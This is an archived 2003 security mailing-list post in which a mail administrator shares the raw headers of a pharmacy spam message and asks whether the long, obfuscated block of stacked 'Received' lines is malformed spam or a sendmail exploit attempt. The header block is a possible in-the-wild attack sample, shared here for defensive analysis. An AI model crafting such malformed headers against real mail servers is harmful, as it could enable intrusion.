sendmail exploit or ill formatted spam

From: Dominik Samuelis (checkpoint-fw1at_private-darmstadt.de)
Date: Mon Mar 10 2003 - 13:49:11 PST

Next message: Curt Wilson: "Re: [Full-Disclosure] Bypassing Black Ice PC protection?"

Previous message: Boyko, Steve: "CANADA.EXE program"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

today I had some messages with the following headers on one of my mail
servers . Ill formatted spam or sendmail exploit in the wild ?

--
Dominik Samuelis



----------- message1----------
From shopdirect@snail-mail.net  Mon Mar 10 14:15:50 2003
X-UIDL: 1*m!!l*H"!_p8!!a0/!!
Return-Path: <shopdirect@snail-mail.net>
Received: from sm21.localdomain ([206.40.229.121])
        by smtpsrv.campanova.net (8.12.8/8.12.8) with ESMTP id
h2ADFYhY013371
        for <xxxat_private>; Mon, 10 Mar 2003 14:15:45 +0100
Received: from unknown
Date: Mon, 10 Mar 2003 06:15:06 -0700 (MST)
Message-Id: <200303101315.h2ADF6l0026203at_private>
Comments: Received: from Pb>;7F=o2@=]4@>|>6:36=EDoDDD?6E]4@>Nz B
          Received: from Jx3FEE6C7=J:?5o;F?@]4@>|36?oAF3=:D:E6]36|?2?4J]>:49
@?o?2D9G:==6]4@>|>:?6CG2o>:?6CG2:?4]4@>|:?G@:4:?8
oK:Aa]4@>|25=6Co>24BF2C:F>]4@>Tx M
          Received: from Ma;@9?oC6?@]BF:<]4@>|>:4<=6o>2:=]4@>>@?=:?<]4@>|563
3:6o?6E\C6D@FC46]4@>|7C2?4:Do>2:=]>:?8A2@]4@>|72F
D6Jo49:=<2ED@7E]4@>|52G6]42C=D@?o?6EH@C<D4@>]4@>Tv T
          Received: from Tu5>442CE9JoA3]?6E|>C\>CDo86@4:E:6D]4@>|8?oD5G]7C|>
@>@?6Jo>@>@?6J]4@>|9@DE>2DE6Co6?E@C?@]6D|;:>>FCA9
J`o2@=]4@>Tq R
          Received: from Ac49C:Do3=@>36C8]?6E|C2=3@?oD5:4]?6E|>E?35Jo2==H6DE
]?6E|D49>:5Eo42>A2?@G2]56|9@DE>2DE6Co>:5H6DE:D]?6
E|>6>46?E6Co>6>AC@]H:?]?6ETz G
          Received: from RmG6?F496<o6C@=D]4@>|3D49J>FC2o@C:8:?6E]4@>]3C|2=6I
oA:=2EFD56D:8?D]4@>|DF?D:?oAF3]K9@?8D92?]85]4?|6>
6?56=o36DE]4@>|<66A6Co4J3CK?]4@>Mr Z
          Received: from Nr432=E2K2Co8@7:=?6E]4@>|82==A6E6Co4@>AFD6CG6]4@>|5
FDE32<oIDc2==]?=|G;3o?6E=23D]?6E|>A56D:8?o36DE]4@
>|C@@EoD6:?6E]:ETT T
          Received: from Nz>@I?I`o62CE9=:?<]?6E|;482=G6Ko9@=@?6E]?6E|392==oD
J?6C8J:?E]4@>|E=>45@H6==oJ29@@]4@>|`_d_ba]adceo4@
>AFD6CG6]4@>|5>2EE96HDo>AD4@>A2?J]4@>Rb Y
          Received: from PQ>G2=G2?@o82C=@4<\:?4]4@>|4DDoE2C86E]?6E|@=:D2EK86
Co2@=]4@>|2CG:?50DFE92Co3:87@@E]4@>|C6D:DEC2CoE96
C@4<:6D]4@>|;@6oD2G2C5]?6ERz M
Errors: shopdirect@snail-mail.net
From: Free Overnight Shipping <shopdirect@snail-mail.net>
To: No Prescription Needed <moreland6512at_private>
Subject: Online Pharmacy Free Shipping
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status: RO


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN
[... normal spam body follows...]



----------------------------------------------------------------------------

<Pre>Lose another weekend managing your IDS?
Take back your personal time.
15-day free trial of StillSecure Border Guard.</Pre>
<A href="http://www.securityfocus.com/stillsecure"> http://www.securityfocus.com/stillsecure </A>

Next message: Curt Wilson: "Re: [Full-Disclosure] Bypassing Black Ice PC protection?"
Previous message: Boyko, Steve: "CANADA.EXE program"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Mar 11 2003 - 09:17:27 PST